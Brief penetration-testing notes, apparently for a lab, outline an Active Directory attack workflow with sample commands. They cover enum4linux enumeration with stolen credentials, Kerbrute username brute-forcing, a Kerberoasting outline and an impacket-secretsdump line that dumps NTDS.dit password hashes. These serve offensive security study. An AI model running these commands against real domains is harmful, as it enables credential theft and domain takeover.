Active Directory

Attack Workflow

Determine what ports are open

Enumerate with

  • Determine open ports

    • Scan ports with Nmap to fingerprint

  • Enumerate AD information

    • Domain info

    • rpcclient

    • enum4linux

  • Get list of users

    • If list not available, bruteforce usernames

    • Determine if kerberos pre-auth exists

    • Determine which users have SPNs (Service Principle Names)


Used to enumerate a huge amount of AD information from the command line.

enum4linux -a # Attempts to enumerate everything at target
enum4linux -u administrator -p password -U # Use stolen creds to enumerate all users
enum4linux -S # Attempt to gather SMB shares


Used to enumerate information about system over RPC


Kerbrute, used to run various kerberos attacks. Written in Go.​

./kerbrute_linux_amd64 userenum --dc -d spookysec.local ../userlist.txt


Using a valid account on a pwned box, we can gather tickets for service accounts and extract the hash to crack. We must find all accounts in AD which have a SPN (Service Principle Name), then request RC4 tickets from the DC.


Used to extract hashes from a server. Below command will get NTDS.dit, assuming that you have an account with those permissions.

impacket-secretsdump -just-dc backup:[email protected]